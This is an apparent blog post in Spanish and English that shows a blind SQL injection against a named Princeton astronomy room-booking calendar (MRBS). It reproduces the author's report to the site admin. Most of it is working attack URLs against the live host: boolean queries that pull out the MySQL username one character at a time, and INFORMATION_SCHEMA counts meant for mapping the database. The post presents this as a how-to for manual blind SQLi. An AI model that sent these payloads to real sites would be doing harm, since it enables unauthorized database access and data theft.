Princeton Blind SQL Injection

Posted on 18:01 by Xianur0

Reporte el bug al admin, y le prometí que no lo diría hasta haberlo corregido:

http://calendar.astro.princeton.edu/mrbs/

(metan en google la búsqueda: astro.princeton.edu/mrbs
y verán que CMs usaba jejeje)

Mensaje:

Good evening, my nickname is Xianur0, I write about and reported security flaws in its system, to begin a Blind SQL Injection (do not authorized to consult your SQL system (MySQL)) for example:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),1,1))=109
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),2,1))=114
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),3,1))=98
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),4,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),5,1))=64
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),6,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),7,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),8,1))=99
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),9,1))=97
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),10,1))=108
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),11,1))=104
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),12,1))=111
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),13,1))=115
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1+AND+ascii(substring((SELECT+user()),14,1))=116

By making a SQL incorrect table stays empty rooms or with a single element, to be correct these consultations, the table shows all the rooms.

Sorting the results in ASCII:
109,114,98,115,64,108,111,99,97,108,104,111,115,116

and translate them into a readable string, we get:
mrbs@localhost

Which is the user of MySQL used by the system, now we made another inquiry to identify which tables are permitted for that user in MySQL:
http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (*) FROM INFORMATION_SCHEMA.TABLES)
There database: INFORMATION_SCHEMA and table: tables, this database contains information on the MySQL (for example: tables, columns, etc.), we now how many databases that are in mysql:

http://calendar.astro.princeton.edu/mrbs/month.php?year=2008&month=08&area=1 AND (SELECT count (TABLE_SCHEMA) FROM INFORMATION_SCHEMA.TABLES) = 20

This means that there are 20 databases recorded in the INFORMATION_SCHEMA, and if we keep the first step (to which we obtained the user can obtain the structure of the system, users obtain and carry out an attack on the system).


Profile: http://milw0rm.com/author/1657
Nick: Xianur0
Web: http://xianur0.blogspot.com
Email: uxmal666@gmail.com

Sorry For My Bad English

bueno el mensaje sirve como ejemplo de Blind SQL Injection manual xD...

jeje hasta los grandes tienen sus malos momentos...

0 comentarios: